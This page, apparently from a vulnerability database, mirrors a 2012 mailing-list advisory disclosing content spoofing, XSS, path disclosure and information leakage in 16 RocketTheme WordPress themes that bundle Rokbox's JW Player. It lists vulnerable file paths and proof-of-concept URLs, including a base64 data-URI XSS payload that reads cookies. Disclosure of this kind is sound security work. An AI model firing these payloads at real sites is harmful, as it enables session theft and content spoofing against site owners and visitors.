Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Rokbox Themes Content Spoofing / XSS

🗓️ 24 Dec 2012 00:00:00Reported by MustLiveType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

Multiple Rokbox WordPress Themes Vulnerabilities Disclose

Code
`Hello list!  
  
Some time ago, when I've found vulnerabilities in plugin BuddyPress for   
WordPress (particularly in Affinity BuddyPress theme for it) with Rokbox,   
which I disclosed earlier, I also found multiple vulnerable themes for WP   
with Rokbox.  
  
So I want to warn you about multiple vulnerabilities in multiple themes for   
WordPress. These are themes developed by Rokbox's developers. And they put   
Rokbox (with JW Player, but without TimThumb) into their themes.  
  
These are Content Spoofing, Cross-Site Scripting, Full path disclosure and   
Information Leakage vulnerabilities. I've disclosed vulnerabilities in JW   
Player in June and August (including in commercial version JW Player Pro)   
and disclosed vulnerabilities in Rokbox in December. These vulnerabilities   
are similar to vulnerabilities in Affinity BuddyPress theme. Also I've found   
many WP themes by other developers with Rokbox, but I'd write about them   
separately, because they have much more holes.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are all WordPress themes by RocketTheme (during quick research I   
found 16 themes for WP, in addition to above-mentioned theme for BP, but I   
supposed all their themes contain Rokbox with JW Player 4.4.198). They   
haven't removed this vulnerable version of JW Player from Rokbox and so from   
any of their themes (for WP and BP), when I've informed them in August.  
  
Here are these 16 vulnerable themes, which I found:  
  
rt_afterburner_wp  
rt_refraction_wp  
rt_solarsentinel_wp  
rt_mixxmag_wp (Mixxmag)  
rt_iridium_wp  
rt_infuse_wp (infuse)  
rt_perihelion_wp  
rt_replicant2_wp  
rt_affinity_wp  
rt_nexus_wp  
rt_sentinel  
rt_mynxx_wp_vestnikp  
rt_mynxx_wp (rt.mynxx.wp)  
rt_moxy_wp  
rt_terrantribune_wp  
rt_meridian_wp  
  
They will be added to those 94 vulnerable themes for WordPress, in which   
I've found vulnerabilities (http://websecurity.com.ua/4915/).  
  
In Google's index there are now up to 634000 pages with Rokbox at WP sites.   
So there are a lot of vulnerable themes and web sites with these themes.  
  
----------  
Details:  
----------  
  
The paths for these themes are the next:  
  
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_refraction_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_solarsentinel_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/jwplayer/jwplayer.swf  
http://site/wordpress/wp-content/themes/Mixxmag/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_iridium_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_infuse_wp/js/rokbox/jwplayer/jwplayer.swf  
http://site/wordpress/wp-content/themes/infuse/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_perihelion_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_replicant2_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_affinity_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_nexus_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_sentinel/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_mynxx_wp_vestnikp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_mynxx_wp/js/rokbox/jwplayer/jwplayer.swf  
http://site/wordpress/wp-content/themes/rt.mynxx.wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_moxy_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_terrantribune_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_meridian_wp/js/rokbox/jwplayer/jwplayer.swf  
  
Content Spoofing (WASC-12):  
  
In parameter file there can be set as video, as audio files.  
  
Swf-file of JW Player accepts arbitrary addresses in parameters file and   
image, which allows to spoof content of flash - i.e. by setting addresses of   
video (audio) and/or image files from other site.  
  
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF  
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg  
  
Content Spoofing (WASC-12):  
  
Swf-file of JW Player accepts arbitrary addresses in parameter config, which   
allows to spoof content of flash - i.e. by setting address of config file   
from other site (parameters file and image in xml-file accept arbitrary   
addresses). For loading of config file from other site it needs to have   
crossdomain.xml.  
  
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml  
  
1.xml  
  
<config>  
<file>1.flv</file>  
<image>1.jpg</image>  
</config>  
  
Content Spoofing (WASC-12):  
  
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site  
  
XSS (WASC-08):  
  
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B  
  
Full path disclosure (WASC-13):  
  
In all these themes there is FPD in index.php   
(http://site/wordpress/wp-content/themes/rt_afterburner_wp/ and the same for   
other themes), which works at default PHP settings. Also potentially there   
are FPD in other php-files of these themes.  
  
Information Leakage (WASC-13):  
  
There are sites with rt_mixxmag_wp theme, which have error log with full   
paths.  
  
http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log  
  
------------  
Timeline:  
------------   
  
2012.05.29 - informed developers of JW Player.  
2012.06.06 - disclosed at my site about JW Player.  
2012.08.18 - informed developers about new holes in JW Player Pro.  
2012.08.23 - disclosed at my site about JW Player Pro.  
2012.08.28 - informed developers of Rokbox.  
2012.12.14 - disclosed at my site about Rokbox.  
2012.12.23 - disclosed to the lists about multiple themes for WordPress with   
Rokbox.  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Dec 2012 00:00Current
0.3Low risk
Vulners AI Score0.3
wordpressrokboxthemes
19